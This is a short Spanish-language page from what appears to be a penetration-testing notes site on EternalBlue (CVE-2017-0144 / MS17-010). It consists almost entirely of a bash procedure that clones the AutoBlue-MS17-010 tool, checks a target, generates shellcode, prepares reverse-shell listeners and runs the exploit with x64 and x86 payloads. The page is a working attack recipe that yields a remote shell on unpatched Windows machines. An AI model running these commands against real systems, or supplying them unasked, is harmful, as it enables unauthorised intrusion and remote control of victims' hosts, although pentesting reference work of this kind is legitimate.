> For the complete documentation index, see [llms.txt](https://pentesting.mrw0l05zyn.cl/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://pentesting.mrw0l05zyn.cl/explotacion/vulnerabilidades/eternalblue-cve-2017-0144-ms17-010.md).

# EternalBlue (CVE-2017-0144 / MS17-010)

* <https://github.com/3ndG4me/AutoBlue-MS17-010>

```bash
# Clonación de repositorio 
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
cd AutoBlue-MS17-010

# Revisión si objetivo es vulnerable a EternalBlue (CVE-2017-0144 / MS17-010)
python3 eternal_checker.py <target>

# Generación de shellcode
cd shellcode && ./shell_prep.sh

# Configuración de listeners de reverse shell
cd .. && ./listener_prep.sh

# Exploit
python3 eternalblue_exploit7.py <target> ./shellcode/sc_all.bin
python3 eternalblue_exploit7.py <target> ./shellcode/sc_x64.bin
python3 eternalblue_exploit7.py <target> ./shellcode/sc_x86.bin
```
